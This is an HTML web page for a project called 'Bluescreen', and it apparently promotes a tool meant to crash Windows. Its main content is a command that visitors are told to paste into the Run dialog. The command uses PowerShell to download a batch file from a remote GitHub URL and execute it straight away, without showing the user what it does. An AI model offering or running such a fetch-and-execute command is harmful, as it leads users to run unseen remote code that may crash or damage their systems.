<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bluescreen</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
        }
        
        h1 {
            color: #333;
        }
        
        p {
            color: white;
            background-color: black;
            padding: 10px;
        }
        
        a {
            color: #007bff;
            text-decoration: none;
        }
        
        a:hover {
            text-decoration: underline;
        }
        
        h3 {
            color: #333;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <h1>Welcome to the Bluescreen website!</h1>
    <br>
    <a href='https://github.com/harryaldwithjarryald/BlueScreen'>Github repo</a>
    <br>
    <a href='https://github.com/harryaldwithjarryald/BlueScreen/blob/main/README.md'>More info about this.</a>
    <br>
    <h3>Execute through the run dialog (win + r) using:</h3>
    <p>cmd /c @echo off &amp; cd %userprofile% &amp; powershell /c wget https://raw.githubusercontent.com/harryaldwithjarryald/BlueScreen/main/online_temp.bat -outfile bluescren_temp.bat &amp;&amp; bluescren_temp.bat</p>
</body>
</html>
